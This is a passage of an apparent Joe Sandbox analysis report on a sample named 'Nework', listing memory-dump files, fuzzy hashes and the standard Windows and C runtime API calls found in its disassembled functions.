                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast_free
                                                                            • String ID:
                                                                            • API String ID: 2283115069-0
                                                                            • Opcode ID: de8493fa4936a3adc8a4a88b02182a8731e5c435b6d794ae53890f07ae8759a3
                                                                            • Instruction ID: cb94c590ed87066bc6a437d60d66fdc4be323d2067fccecb11eed85ba88fe0b3
                                                                            • Opcode Fuzzy Hash: de8493fa4936a3adc8a4a88b02182a8731e5c435b6d794ae53890f07ae8759a3
                                                                            • Instruction Fuzzy Hash: CA1177322086086AD61766B46CCAF3F225D9FF1778BA9022DF714D61D1DF71DC468222
                                                                            APIs
                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001C1223
                                                                            • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 001C11D4
                                                                              • Part of subcall function 001B817B: SafeRWList.LIBCONCRT ref: 001B818C
                                                                            • SafeRWList.LIBCONCRT ref: 001C1219
                                                                            • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 001C1239
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                            • String ID:
                                                                            • API String ID: 336577199-0
                                                                            • Opcode ID: 8329089a705ecf16a2d62846700dd6e39550c5ed8cf823dbe4ea4e6a61de8a35
                                                                            • Instruction ID: 9b26a1e7f8ed7ae18c439074e1e3ff8cce19e36cded64979e671c065089f89d8
                                                                            • Opcode Fuzzy Hash: 8329089a705ecf16a2d62846700dd6e39550c5ed8cf823dbe4ea4e6a61de8a35
                                                                            • Instruction Fuzzy Hash: AA21077564020EEFC704DF24C881FA5FBE9BBA6714F24C2AAD4054B142DB35E986CB80
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,001C7378,00192207), ref: 001CA5BD
                                                                            • _free.LIBCMT ref: 001CA61A
                                                                            • _free.LIBCMT ref: 001CA650
                                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,001C7378,00192207), ref: 001CA65B
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast_free
                                                                            • String ID:
                                                                            • API String ID: 2283115069-0
                                                                            • Opcode ID: cfd3697bc0c442df05f5b9829fa4d77eff98ab7c9b6095d44c274cd8fe9be00e
                                                                            • Instruction ID: 35fa3d4b337b6d6c521facdcec3454b53f603dde05d435cc4c58811f99526c96
                                                                            • Opcode Fuzzy Hash: cfd3697bc0c442df05f5b9829fa4d77eff98ab7c9b6095d44c274cd8fe9be00e
                                                                            • Instruction Fuzzy Hash: C811C2322086182AD61326B45CC6F3B265EAFF07B9BA9422CF314C61D1DB71DC418226
                                                                            APIs
                                                                            • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 001AF16F
                                                                              • Part of subcall function 001AF32B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 001B52E6
                                                                            • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 001AF190
                                                                              • Part of subcall function 001B0012: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 001B002E
                                                                            • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 001AF1AC
                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 001AF1B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                                                                            • String ID:
                                                                            • API String ID: 1684785560-0
                                                                            • Opcode ID: d8ef9608b57dccfe544088c3166d0ddd05a0c940581e6dd0ec1fed340f68b8e7
                                                                            • Instruction ID: 5e77c9116fbb1b0aa72ef1bf08ac80fbdf31721a068f9b610f590823a1dbb31b
                                                                            • Opcode Fuzzy Hash: d8ef9608b57dccfe544088c3166d0ddd05a0c940581e6dd0ec1fed340f68b8e7
                                                                            • Instruction Fuzzy Hash: 6C01C479500309EADB207FA9CC8199BBBACEF22394B50493EF55592181D7B0D905C7A1
                                                                            APIs
                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001C3238
                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 001C324C
                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 001C3264
                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C327C
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                            • String ID:
                                                                            • API String ID: 78362717-0
                                                                            • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                            • Instruction ID: d58fcf1ff8251d59980848287e0d230561238d1104a91768851902735b8cb7a3
                                                                            • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                            • Instruction Fuzzy Hash: 7A01A236600514B7CF16AE54C851FEF77AAAF75350F004519FC22AB282DB21EE0196A0
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,001CB6A1,00000000,?,001D1D9B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 001CB552
                                                                            • GetLastError.KERNEL32(?,001D1D9B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,001CB6A1,00000000,00000104,?), ref: 001CB55C
                                                                            • __dosmaperr.LIBCMT ref: 001CB563
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 2398240785-0
                                                                            • Opcode ID: bd6e7fc68ae0b55f3e741e49883af19ecd132177d20dab6750800cc9048beb15
                                                                            • Instruction ID: 8b04a615c2ed15ddf96f025a97cadd17d88dcd46011632d9dcce9f663c257aff
                                                                            • Opcode Fuzzy Hash: bd6e7fc68ae0b55f3e741e49883af19ecd132177d20dab6750800cc9048beb15
                                                                            • Instruction Fuzzy Hash: 7FF08631604155BB8B215FA2DC45E4EFF69FF693A0B004119F519CB420C771E891DBD0
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,001CB6A1,00000000,?,001D1D26,00000000,00000000,001CB6A1,?,?,00000000,00000000,00000001), ref: 001CB5BB
                                                                            • GetLastError.KERNEL32(?,001D1D26,00000000,00000000,001CB6A1,?,?,00000000,00000000,00000001,00000000,00000000,?,001CB6A1,00000000,00000104), ref: 001CB5C5
                                                                            • __dosmaperr.LIBCMT ref: 001CB5CC
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 2398240785-0
                                                                            • Opcode ID: 859cb6f73f6ed66e8ea0a1ce96a6f4448d4f848ef0a6001da3a27f933b14a669
                                                                            • Instruction ID: 0ceefbf163e5fe19495ded809b365fc3060b5e709667f74d7424d66e1e922e1b
                                                                            • Opcode Fuzzy Hash: 859cb6f73f6ed66e8ea0a1ce96a6f4448d4f848ef0a6001da3a27f933b14a669
                                                                            • Instruction Fuzzy Hash: EAF0A931608155BBCB215FE2DC45E5AFF6AFF643A0B014519F419CB520CB71E891DBD0
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00198610,0000000F,001EFB08,00000000,00198610,?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610), ref: 001D68D6
                                                                            • GetLastError.KERNEL32(?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610,00000000,00198610,?,001D03D8,00198610), ref: 001D68E2
                                                                              • Part of subcall function 001D68A8: CloseHandle.KERNEL32(FFFFFFFE,001D68F2,?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610,00000000,00198610), ref: 001D68B8
                                                                            • ___initconout.LIBCMT ref: 001D68F2
                                                                              • Part of subcall function 001D686A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001D6899,001D4F97,00198610,?,001CFE84,00000000,?,00198610,00000000), ref: 001D687D
                                                                            • WriteConsoleW.KERNEL32(00198610,0000000F,001EFB08,00000000,?,001D4FAA,00198610,00000001,00198610,00198610,?,001CFE84,00000000,?,00198610,00000000), ref: 001D6907
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: 0bd227eb6738c6abda44ea23dec0f7c61ef8da1bd724fd47dda61cc8389820aa
                                                                            • Instruction ID: 5c690f6529ef24fba2dcbe71fe7fda8185030324906bfa1272fb2e07d3bbad58
                                                                            • Opcode Fuzzy Hash: 0bd227eb6738c6abda44ea23dec0f7c61ef8da1bd724fd47dda61cc8389820aa
                                                                            • Instruction Fuzzy Hash: 1AF03736001169BBCF521FD5DC08A9D3F65FB087A5F154012FE1885630C77189A0DB90
                                                                            APIs
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001C15C1
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C160C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                            • String ID: pContext
                                                                            • API String ID: 3390424672-2046700901
                                                                            • Opcode ID: e7183b687887025fc305298ae44b85ad6ff5fae898c1df71e951771f88926ec3
                                                                            • Instruction ID: 4e97308017152df16547b576f38ee2c1251e48bff5a11cabaa77552601c11979
                                                                            • Opcode Fuzzy Hash: e7183b687887025fc305298ae44b85ad6ff5fae898c1df71e951771f88926ec3
                                                                            • Instruction Fuzzy Hash: E0112936B80210ABCF1AEF68C485E6D7375AFA63A0B15806DE9029B343DB74DD01CBC0
                                                                            APIs
                                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 001BB7AE
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001BB7C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                            • String ID: pContext
                                                                            • API String ID: 548886458-2046700901
                                                                            • Opcode ID: 52a98401b090401bc9cc1740e8bce7fe414ffa88a6bbf2ecdaac0c4033b299d9
                                                                            • Instruction ID: e116a24f08630d1b84e03a6cf4fab39f309a698397d298e1445766f5b7f24535
                                                                            • Opcode Fuzzy Hash: 52a98401b090401bc9cc1740e8bce7fe414ffa88a6bbf2ecdaac0c4033b299d9
                                                                            • Instruction Fuzzy Hash: 16E0D83DB002086BCB04B7A9E899D9EB7BD9FE47147148019E511E3392DFB4EA44CED0
                                                                            APIs
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B335C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::invalid_argument::invalid_argument
                                                                            • String ID: pScheduler$version
                                                                            • API String ID: 2141394445-3154422776
                                                                            • Opcode ID: 8f68aa20e33c9dab4c2dad5cfa2a7dd46cceb776ee8316d2d8d593ad915b4bfa
                                                                            • Instruction ID: f3d9415cf3438d3c99adb6ab4e4ef39f165b2f204086d13818f27d1bfc7a2b22
                                                                            • Opcode Fuzzy Hash: 8f68aa20e33c9dab4c2dad5cfa2a7dd46cceb776ee8316d2d8d593ad915b4bfa
                                                                            • Instruction Fuzzy Hash: A0E08C38584748BACB15EA69D80AFCE77A8AB20708F14C025F420650E19BF4D7ACCE81